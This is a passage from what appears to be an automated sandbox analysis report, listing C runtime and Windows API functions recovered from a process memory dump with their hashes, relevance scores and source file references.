                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: 0dd02871fb8c6261afa882b2c7cf634e954f01295bc1637dd505c20a209e8388
                                                                                                                                                                                                                                                    • Instruction ID: 7d3d1b948df3afea62f885ff8b8d8d6e3aed84503962eb609be0ec5651571d92
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0dd02871fb8c6261afa882b2c7cf634e954f01295bc1637dd505c20a209e8388
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA21B87690020CAFDB01EF94C991DDE7BF9BF18340F0051A5B555BB161EB72DA98CB80
                                                                                                                                                                                                                                                    Function 00DF8CA3 Relevance: 13.6, APIs: 9, Instructions: 139threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3943753294-0
                                                                                                                                                                                                                                                    • Opcode ID: 11df6628793a48f37e8325f5567bed47ddb8eceea4abe484b2772d7aa2709c4c
                                                                                                                                                                                                                                                    • Instruction ID: ba65d8915eac9f4c51c4e23a56c8fff40c053ae6a4f565393b9ab785ce0d2afa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11df6628793a48f37e8325f5567bed47ddb8eceea4abe484b2772d7aa2709c4c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9518F3190021DCFDF20DF54D981579B7B4EF15310B2AC49AEA06AB291DB30ED45EB76
                                                                                                                                                                                                                                                    Function 00DF2690 Relevance: 12.3, APIs: 8, Instructions: 343COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3990724213-0
                                                                                                                                                                                                                                                    • Opcode ID: db7b08e33efb4f0ed019320bc79517ee7bd9ecb64697f18c95dd3ba8403988b2
                                                                                                                                                                                                                                                    • Instruction ID: cb382f9021bd433e18a62a5c4572fefdd17ecd55b268424904503d9c85def30a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db7b08e33efb4f0ed019320bc79517ee7bd9ecb64697f18c95dd3ba8403988b2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28B11771D0060DAFDB21DF64C845BBEBBB4EF05300F05852EEA5697692DB31A944CBB2
                                                                                                                                                                                                                                                    Function 00DF96F6 Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00DF973F
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00DF976B
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00DF97AA
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DF97C7
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00DF9806
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00DF9823
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DF9865
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00DF9888
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2040435927-0
                                                                                                                                                                                                                                                    • Opcode ID: 8c902c65b0adf6b6fd7acf9892f078efc4b4841c2d5c9a25c44e64246c205243
                                                                                                                                                                                                                                                    • Instruction ID: b7c0d792e55cc216ef304808032390d3a304ba546fc85fc0beac57b74937b8d4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c902c65b0adf6b6fd7acf9892f078efc4b4841c2d5c9a25c44e64246c205243
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85518D72D1020AAFEF209F65DC55FBABBA9EF45790F1A8025BA04EA150D731CD10DA70
                                                                                                                                                                                                                                                    Function 00E05890 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00E06CF0: GetLastError.KERNEL32(?,?,?,00DFE157,?,?,?,?,00DFEFF2,?), ref: 00E06CF5
                                                                                                                                                                                                                                                      • Part of subcall function 00E06CF0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00DFE157,?,?,?,?,00DFEFF2,?), ref: 00E06D93
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E05B7B
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E05B94
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E05BD2
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E05BDB
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E05BE7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorLast
                                                                                                                                                                                                                                                    • String ID: C
                                                                                                                                                                                                                                                    • API String ID: 3291180501-1037565863
                                                                                                                                                                                                                                                    • Opcode ID: 6361419379c4534145eee3a0c214c3ff4688dc5b1c9a3e16df048951d023bc1c
                                                                                                                                                                                                                                                    • Instruction ID: d08394b0a63fad022c78bddfdc00e44bb293c3fc4e425eb47b2e6668749f5312
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6361419379c4534145eee3a0c214c3ff4688dc5b1c9a3e16df048951d023bc1c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0B15C76A016199FDB24DF18C884AAEB7B4FF58314F5055AAE849B7390E730AED0CF40
                                                                                                                                                                                                                                                    Function 00E05405 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00E08305: HeapAlloc.KERNEL32(00000000,?,?,?,00E0FA70,00000220,?,?,?,?,?,?,00DFEFF2,?), ref: 00E08337
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E05514
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E0552B
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E05548
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E05563
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E0557A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$AllocHeap
                                                                                                                                                                                                                                                    • String ID: lM
                                                                                                                                                                                                                                                    • API String ID: 1835388192-2276263786
                                                                                                                                                                                                                                                    • Opcode ID: 34414610b4ffa65c3d7d4d987594736efb2ccdc55f98fa61d1bcc2be8e6818ae
                                                                                                                                                                                                                                                    • Instruction ID: b4489913efe55baafbb755baa05281d974c21c67069b3bc0e72f549fe6ea454b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34414610b4ffa65c3d7d4d987594736efb2ccdc55f98fa61d1bcc2be8e6818ae
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6251D072A00B049FDB21DF69DC41A6B77F5EF54714B141569E846FB2D0E731EA808F90
                                                                                                                                                                                                                                                    Function 00DE2260 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: list too long
                                                                                                                                                                                                                                                    • API String ID: 0-1124181908
                                                                                                                                                                                                                                                    • Opcode ID: d43dcdceac4cab347078a95716bdf2eb6665db76e1deab061befe7fe3e8ecfeb
                                                                                                                                                                                                                                                    • Instruction ID: 8382c52e9228b1994291d72798d64435b86324b68b4e473901fd52ab1be77cbb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d43dcdceac4cab347078a95716bdf2eb6665db76e1deab061befe7fe3e8ecfeb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A51A3B1D047589BDB20DF55CC49BA9F7B8FF04310F0482A9E90CA7291DB70AA85CF66
                                                                                                                                                                                                                                                    Function 00DFE9D6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: Y$X
                                                                                                                                                                                                                                                    • API String ID: 0-2656491316
                                                                                                                                                                                                                                                    • Opcode ID: 5fc9fdd5e113fb19002b38327768449be9664e2984bd0f412dc3ad2e0b9fa0bf
                                                                                                                                                                                                                                                    • Instruction ID: beb6fe6288f082a0220ed0d6eeb7a8542de099c1a70c6e6b53defc0388de1540
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fc9fdd5e113fb19002b38327768449be9664e2984bd0f412dc3ad2e0b9fa0bf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8841EB71600708BFD7159F78CC41BAABBE9FF88710F15C669F251DB2A1D271994187A0
                                                                                                                                                                                                                                                    Function 00DFC710 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00DFC747
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00DFC74F
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00DFC7D8
                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00DFC803
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00DFC858
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 7502bcb55c880eca3576f5a33c409342e93ea924a5160e3c2ef0160dda8f453d
                                                                                                                                                                                                                                                    • Instruction ID: c39373e8d3095ee279f76ead5dd60a83f6c7030795fb8053b5d1e90ef3cfec06
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7502bcb55c880eca3576f5a33c409342e93ea924a5160e3c2ef0160dda8f453d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD41A434A1020CABCF10EF69C945AAEBBB5EF44324F19D155EA18AB352D7319A15CFB0
                                                                                                                                                                                                                                                    Function 00E11306 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00E11052: _free.LIBCMT ref: 00E11077
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E11354
                                                                                                                                                                                                                                                      • Part of subcall function 00E080D6: HeapFree.KERNEL32(00000000,00000000,?,00E1107C,?,00000000,?,?,?,00E1131F,?,00000007,?,?,00E117C4,?), ref: 00E080EC
                                                                                                                                                                                                                                                      • Part of subcall function 00E080D6: GetLastError.KERNEL32(?,?,00E1107C,?,00000000,?,?,?,00E1131F,?,00000007,?,?,00E117C4,?,?), ref: 00E080FE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E1135F
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E1136A
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E113BE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E113C9
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E113D4
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E113DF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
                                                                                                                                                                                                                                                    • Instruction ID: ad6fe2e6942db5d565d0c43bb8b011ee3379f9d2c08b5baaf02909e4fcb4841c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40113DB1D41B44EAE670BBB0CC07FDB77DC6F08700F405C65B3EA76092DA65A5C54691
                                                                                                                                                                                                                                                    Function 00E0768F Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00E076D7
                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00E078BC
                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00E078D9
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E07921
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00E07961
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E07A09
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1735259414-0
                                                                                                                                                                                                                                                    • Opcode ID: a7635f566f9f640051a7a1db3ab2b509af8c24a41e413627422977c672559e2d
                                                                                                                                                                                                                                                    • Instruction ID: 4ddfb9ebfc035b450d8d3808b8ce5626ebb848c63db0669f7c2c557ef2bfca47
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7635f566f9f640051a7a1db3ab2b509af8c24a41e413627422977c672559e2d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2EC19171D052589FCB14CFA8C8849EDBBB5FF48304F28916AE895F7281D631AE46CF60
                                                                                                                                                                                                                                                    Function 00DF46A0 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00DF46D5
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00DF46F7
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00DF4717
                                                                                                                                                                                                                                                    • __Getctype.LIBCPMT ref: 00DF47AD
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00DF47CC
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00DF47E4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1102183713-0
                                                                                                                                                                                                                                                    • Opcode ID: fedf401127c110d6a6ef8fadc43be4fbea451842e55f29b06548185f8fa25ae5
                                                                                                                                                                                                                                                    • Instruction ID: 2539f521b55c4a664afc21bc322e23fd63ea63c4c77d3bd4df03974047e02c5b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fedf401127c110d6a6ef8fadc43be4fbea451842e55f29b06548185f8fa25ae5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F41CC3090021C8FCB11EF54C841BBFBBF4EF54710F268169E906AB251DB30AA45CBE1
                                                                                                                                                                                                                                                    Function 00DFC8D4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00DFC8CB,00DFAF64,00DF7C79,E7FD9D7B,?,?,?,00000000,00E1C8A7,000000FF,?,00DD2576,?,?), ref: 00DFC8E2
                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DFC8F0
                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DFC909
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,00E1C8A7,000000FF,?,00DD2576,?,?,?,00DD3BA5,00000000,?,00000000,00E1C240,000000FF), ref: 00DFC95B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                    • Opcode ID: ff80b4928d43473ec1091e0929b4d6470ec12fd2111f0b2e39f641d621454d4a
                                                                                                                                                                                                                                                    • Instruction ID: 6c0559b0e972695dac0d60b986615b99a0055230773812c08c99be3e8cdb1b70
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff80b4928d43473ec1091e0929b4d6470ec12fd2111f0b2e39f641d621454d4a
